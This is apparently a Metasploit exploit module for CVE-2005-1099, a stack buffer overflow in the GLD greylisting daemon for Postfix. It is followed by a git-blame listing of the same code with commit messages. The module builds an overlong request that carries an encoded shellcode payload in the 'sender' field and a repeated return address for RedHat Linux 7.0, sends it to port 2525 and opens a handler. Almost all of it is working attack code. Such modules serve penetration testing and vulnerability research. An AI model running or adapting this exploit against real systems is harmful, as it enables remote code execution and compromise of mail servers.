modules/exploits/linux/misc/gld_postfix.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'	=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
        'Description'	=> %q{
          This module exploits a stack buffer overflow in the Salim Gasmi
          GLD <= 1.4 greylisting daemon for Postfix. By sending an
          overly long string the stack can be overwritten.
        },
        'Author'	=> [ 'aushack' ],
        'Arch'	=> ARCH_X86,
        'Platform'	=> 'linux',
        'References' => [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'EDB', '934' ]
        ],
        'Privileged'	=> true,
        'License'	=> MSF_LICENSE,
        'Payload' => {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
        'DefaultTarget'	=> 0,
        'DisclosureDate' => '2005-04-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  def exploit
    connect

    sploit = "sender=" + payload.encoded + "\r\n"
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)
    handler
    disconnect
  end
end
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`##`

OCD fixes - Spaces 2017-07-14 08:46:59 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the Salim Gasmi`
			`GLD <= 1.4 greylisting daemon for Postfix. By sending an`
			`overly long string the stack can be overwritten.`
			`},`
			`'Author' => [ 'aushack' ],`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux',`
			`'References' => [`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`[ 'CVE', '2005-1099' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '15492' ],`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`[ 'BID', '13129' ],`
Update milw0rm references. 2012-06-28 14:27:12 -05:00			`[ 'EDB', '934' ]`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => true,`
			`'License' => MSF_LICENSE,`
			`'Payload' => {`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`'Space' => 1000,`
			`'BadChars' => "\x00\x0a\x0d\x20=",`
			`'StackAdjustment' => -3500,`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultTarget' => 0,`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2005-04-12',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00
			`register_options(`
			`[`
			`Opt::RPORT(2525)`
			`],`
			`self.class`
			`)`
			`end`
ensure binary mode when opening files, whitespace fixes 2010-07-01 23:33:07 +00:00
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`def exploit`
			`connect`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit = "sender=" + payload.encoded + "\r\n"`
Added gld_postfix.rb module 2008-06-07 02:16:34 +00:00			`sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"`

			`sock.put(sploit)`
			`handler`
			`disconnect`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`